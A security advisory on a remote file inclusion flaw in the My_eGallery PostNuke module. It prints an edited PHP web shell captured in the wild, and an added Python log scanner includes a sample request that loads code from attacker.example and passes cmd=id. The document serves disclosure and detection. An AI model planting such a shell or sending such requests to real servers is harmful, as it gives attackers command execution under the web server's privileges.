My_eGallery is "a very nice PostNuke module, which allows users to create and manipulate their own galleries on the web, plus offers various additional features". A vulnerability in the product allows remote attackers to inject code and have it executed with the privileges My_eGallery runs under.
Credit:
The information has been provided by Bojan Zdrnja.
Vulnerable systems:
* My_eGallery version 3.1.1.f and prior
Immune systems:
* My_eGallery version 3.1.1.g
Certain PHP files pass request parameters to include functions without filtering them. An intruder can host PHP code on their own Web site and supply a parameter to My_eGallery that points at it, so that My_eGallery includes and runs the malicious PHP code.
The following code was captured as being used in the wild (edited intentionally):
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
print_output();
?>
This allows execution of any command on the server running My_eGallery, under the privileges of the Web server (usually apache or httpd).
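The following detection sketch is an added example, not part of the original advisory or of My_eGallery. It scans web server access log lines for the two request traits described above: a parameter to a PHP file whose value is a remote URL, and the `cmd` / `chdir` variables the captured script reads. The log lines, the script path and the parameter name `basepath` are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a common/combined log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself a remote URL is the mark of remote inclusion.
REMOTE_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Variable names read by the captured script shown in the advisory.
SHELL_PARAMS = {"cmd", "chdir"}

def inspect_line(line):
    """Return a list of (reason, parameter, value) findings for one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith(".php"):
        return []
    findings = []
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if REMOTE_VALUE_RE.match(value.strip()):
            findings.append(("remote-include", name, value))
        elif name.lower() in SHELL_PARAMS:
            findings.append(("shell-parameter", name, value))
    return findings

def scan(lines):
    """Map 1-based line numbers to their findings, skipping clean lines."""
    report = {}
    for number, line in enumerate(lines, start=1):
        findings = inspect_line(line)
        if findings:
            report[number] = findings
    return report

# Constructed sample input; path and "basepath" are hypothetical placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /modules/example/view.php?id=7 HTTP/1.0" 200 5120',
    '192.0.2.66 - - [01/Jan/2004:10:01:00 +0000] "GET /modules/example/view.php'
    '?basepath=http%3A%2F%2Fattacker.example%2Fx.gif%3F&cmd=id HTTP/1.0" 200 312',
    '192.0.2.10 - - [01/Jan/2004:10:02:00 +0000] "GET /index.php?name=gallery HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(number, findings)
```

Access logs record only the query string, so parameters sent in a POST body are not visible to this check.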